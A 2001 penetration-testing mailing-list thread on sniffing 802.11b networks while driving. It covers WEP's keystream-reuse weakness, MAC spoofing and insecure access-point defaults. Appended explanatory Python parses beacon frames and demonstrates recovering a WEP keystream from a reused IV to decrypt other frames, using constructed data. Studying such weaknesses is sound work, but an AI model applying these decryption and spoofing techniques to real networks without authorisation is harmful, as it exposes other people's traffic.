Penetration Testing mailing list archives

Re: [PEN-TEST] Penetrating Wireless Networks


From: Mark Seiden <mis () SEIDEN COM>
Date: Wed, 7 Mar 2001 11:32:52 -0800

(be careful: it's just a matter of time before the first fatal
accident involving use of wireless sniffers while driving...
i have termed this "war driving".)

a useful tool for win2k is wildpackets "airopeek" wireless sniffer.
it has just come out of beta, and the beta version only supports
the cisco 340 family NIC, due to modified NDIS drivers.

with this running on my laptop while i drive i usually pick up
an access point per mile or two, even at > 60 mph with no special
antenna.

you can see the wireless frames including 802.11 beacons, which contain
the name of the access point, the channel and whether WEP is in use,
as well as all of the MAC addresses of talking interfaces, and a signal
strength indication so you can figure out which way to go.

if you supply the wep keys, it will decrypt.

it's a useful sniffer ... but:  it does not produce frames in tcpdump
format. you need a separate utility for that.

also, it's EXPENSIVE: $1995 plus maintenance.  aargh.  (i got the beta
for free...)  (maybe they need more competition... from something free?)

regarding general sniffing of WLAN:

choice of antenna is important, by the way, if you want to do "war
driving".  (peter shipley recently mentioned he had a gps hooked up to
a sniffer as well, so he records a location when the frames were
received ...)

you don't need the SSID.  it provides no value anyway (since you can
use the ALL value).  but you can see it in the 802.11 beacons, and
with WEP it gives a clue to the organization owning the access point
(without WEP their email and web surfing is a much better clue...).

it does not appear that MAC-based access control (which some access
points have) is entirely useful, since you can change your MAC address
on some interfaces to spoof that of some NIC you've seen successfully
talking.

802.11b WEP provides little value (regardless of key length chosen)
due to the reuse of the keystream, the lack of dynamic rekeying, and
the possibility of known plaintext attacks.  you have to record a few
gigabytes of WEP data traffic to launch this attack, though, and i
don't believe anyone has yet automated the exploit.  (this has been
known by members of the 802.11 committee for at least a year, more
like two...)

(802.11e is trying to fix this, and cisco has announced an 802.1x
implementation for the 350 card which seemingly complies with the
compromise proposal in the 802.11 committee).

as a separate issue: some of the wireless access points ship with
naive ideas about administration and maintenance.

(run nmap against an access point...)

the smc and addtron access points, which use code licensed from a
little company in ontario, neesus, have an open service (a listener
for a no longer available proprietary and undocumented administration
utility) which does nothing (they say -- we shall see), a web server
for configuration with an unchangeable user "default", and a default
password (which is changeable, at least).  there are also strings in
the access point binary image which make me wonder about back doors --
neesus says they can't explain them and maybe they're from the
development environment they use.

it's the wild west out there...

On Tue, Mar 06, 2001 at 07:23:22PM -0600, Frank Knobbe wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings,

I know the technologies are rather new compared to wired networks,
but does anyone have any pointers for penetration tests of wireless
networks, 802.11b in particular?

In my opinion, with the advance of wireless networks, this will be a
very important part of pen tests. Has anyone developed any
methodologies for such tests? Are there any tools available that
assist in testing wireless networks? For example, one is able to run
tcpdump and other goodies on the wireless card just like on regular
NICs. However, in order to gain access to the WLAN, one must know
not only the WEP encryption key (if WEP is used), but also the ESS
(network identifier), preamble length, and channel number. Are there
any tools that provide automation of changes for these values (for an
automated scan)? Are there any tools for 'low-level' 802.11b data
examination (i.e. preamble checking/display, etc)?

Regards,
Frank


-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME encrypted email preferred.

iQA/AwUBOqWNiZytSsEygtEFEQJ2oQCg4/opiTBaIeIx1TeJhnJ8ZtJ8SdAAoK2M
uEjKyVpUpTsC9ci2eJ++DA+N
=C3F0
-----END PGP SIGNATURE-----

--
mark seiden, mis () seiden com, 1-(650) 592 8559 (voice) Pacific Time Zone
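As an added example (editorial, not code from the post or from any tool it names), here is a parser for the beacon fields described above: the SSID, the channel (from the DS Parameter Set element), the Privacy bit in the capability field that announces WEP, and the transmitter and BSSID addresses. The frame it parses is constructed inline rather than captured, and the BSSID, SSID and channel values are invented for the test.

```python
import struct

# IEEE 802.11 management frame layout (all multi-byte fields little-endian)
MGMT_HEADER_LEN = 24    # FrameControl(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2)
BEACON_FIXED_LEN = 12   # Timestamp(8) BeaconInterval(2) CapabilityInfo(2)
CAP_ESS = 0x0001        # capability bit 0: infrastructure network
CAP_PRIVACY = 0x0010    # capability bit 4: the "WEP in use" flag
IE_SSID = 0             # information element tags used below
IE_RATES = 1
IE_DS_PARAMS = 3        # value is a single byte: the channel number


def _mac(raw):
    return ":".join("%02x" % b for b in raw)


def parse_ies(body):
    """Walk tag/length/value elements; stop on a length that runs past the
    buffer instead of trusting it (a malformed beacon must not crash the sniffer)."""
    ies = {}
    pos = 0
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:
            break
        ies.setdefault(tag, value)       # keep the first copy of a repeated tag
        pos += 2 + length
    return ies


def parse_beacon(frame):
    """Return the fields a war-driving sniffer shows for one beacon frame."""
    if len(frame) < MGMT_HEADER_LEN + BEACON_FIXED_LEN:
        raise ValueError("frame too short to be a beacon")
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype != 8:       # type 0 = management, subtype 8 = beacon
        raise ValueError("not a beacon (type %d, subtype %d)" % (ftype, subtype))
    interval, cap = struct.unpack_from("<HH", frame, MGMT_HEADER_LEN + 8)
    ies = parse_ies(frame[MGMT_HEADER_LEN + BEACON_FIXED_LEN:])
    ssid = ies.get(IE_SSID, b"")
    ds = ies.get(IE_DS_PARAMS)
    return {
        "sa": _mac(frame[10:16]),        # transmitter (the AP radio)
        "bssid": _mac(frame[16:22]),
        "ssid": ssid.decode("utf-8", "replace"),
        "ssid_hidden": ssid.strip(b"\x00") == b"",   # empty or all-NUL SSID
        "channel": ds[0] if ds else None,
        "wep": bool(cap & CAP_PRIVACY),
        "beacon_interval_tu": interval,  # units of 1024 microseconds
    }


def build_beacon(ssid, channel, wep, bssid=b"\x00\x11\x22\x33\x44\x55"):
    """Constructed sample frame for offline testing (not a real capture); the
    default BSSID and the timestamp are arbitrary."""
    cap = CAP_ESS | (CAP_PRIVACY if wep else 0)
    header = (b"\x80\x00"            # frame control: management / beacon
              + b"\x00\x00"          # duration
              + b"\xff" * 6          # Addr1: broadcast
              + bssid + bssid        # Addr2 (SA) and Addr3 (BSSID)
              + b"\x10\x00")         # sequence control
    fixed = struct.pack("<QHH", 0x1234, 100, cap)
    ies = bytes([IE_SSID, len(ssid)]) + ssid
    ies += bytes([IE_RATES, 4]) + b"\x82\x84\x8b\x96"   # 1/2/5.5/11 Mbit/s, basic
    ies += bytes([IE_DS_PARAMS, 1, channel])
    return header + fixed + ies


SAMPLE_BEACON = build_beacon(b"corp-ap", 6, True)

if __name__ == "__main__":
    for k, v in parse_beacon(SAMPLE_BEACON).items():
        print("%-19s %s" % (k, v))
```

The bounds check in parse_ies is the part worth copying: beacon lengths come straight off the air, and a tag whose declared length exceeds the frame is exactly the sort of input a sniffer sees sooner or later.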

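The WEP weakness named in the reply (keystream reuse with no rekeying, plus known plaintext) as a worked example, added here and not taken from the post: a minimal WEP encrypt/decrypt with RC4 and a CRC-32 ICV, then the attacker's side when two frames arrive under the same IV. The key, IV and frame contents are constructed for the demonstration; the eight-byte LLC/SNAP header is the standard prefix of every IP packet on 802.11 and is what serves as known plaintext.

```python
import struct
import zlib


def rc4(key, length):
    """Plain RC4 keystream generator (KSA + PRGA), as used by WEP."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key, iv, plaintext):
    """WEP frame body: IV(3) || KeyID(1) || RC4_{IV||key}(plaintext || ICV).
    The ICV is CRC-32 of the plaintext; the per-packet RC4 key is the 24-bit
    IV prepended to the shared 40- or 104-bit key."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    data = plaintext + icv
    return iv + b"\x00" + xor(data, rc4(iv + shared_key, len(data)))


def wep_decrypt(shared_key, body):
    """Legitimate receiver: returns the plaintext, or None if the ICV fails."""
    iv, payload = body[:3], body[4:]
    data = xor(payload, rc4(iv + shared_key, len(payload)))
    plaintext, icv = data[:-4], data[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        return None
    return plaintext


# Attacker's side: no key, just two frames that reuse one IV.
SNAP_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"   # LLC/SNAP header of every IP frame


def same_iv(body_a, body_b):
    """The IV is sent in the clear, so IV collisions are visible to a sniffer."""
    return body_a[:3] == body_b[:3]


def recover_keystream(body, known_plaintext):
    """keystream = ciphertext XOR known plaintext, for as many bytes as are known."""
    return xor(body[4:4 + len(known_plaintext)], known_plaintext)


def decrypt_with_keystream(body, keystream):
    """Decrypt as much of another same-IV frame as the recovered keystream covers."""
    return xor(body[4:4 + len(keystream)], keystream)


def plaintext_xor(body_a, body_b):
    """Even with no known plaintext, C_a XOR C_b = P_a XOR P_b under a reused keystream."""
    n = min(len(body_a), len(body_b)) - 4
    return xor(body_a[4:4 + n], body_b[4:4 + n])


# Constructed demonstration data (not a capture): a 40-bit key and a reused IV.
KEY = b"\x0b\xad\xc0\xff\xee"
IV = b"\x12\x34\x56"
FRAME_A = SNAP_IP + b"\x45\x00\x00\x1c" + b"known payload, e.g. a ping"
FRAME_B = SNAP_IP + b"\x45\x00\x00\x30" + b"GET /login?pw=hunter2"
BODY_A = wep_encrypt(KEY, IV, FRAME_A)
BODY_B = wep_encrypt(KEY, IV, FRAME_B)

if __name__ == "__main__":
    ks = recover_keystream(BODY_A, FRAME_A)   # attacker knows frame A in full
    print(decrypt_with_keystream(BODY_B, ks)[:len(FRAME_B)])
```

Two things to take from it: the SNAP header alone yields eight keystream bytes for every IV ever seen, without needing to know any frame completely, and a single fully known frame (one the attacker caused to be sent, for instance) yields the keystream for that IV up to its length, which then decrypts every other frame sent under the same IV. Key length does not enter into either step, which is the point of the "regardless of key length chosen" remark.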
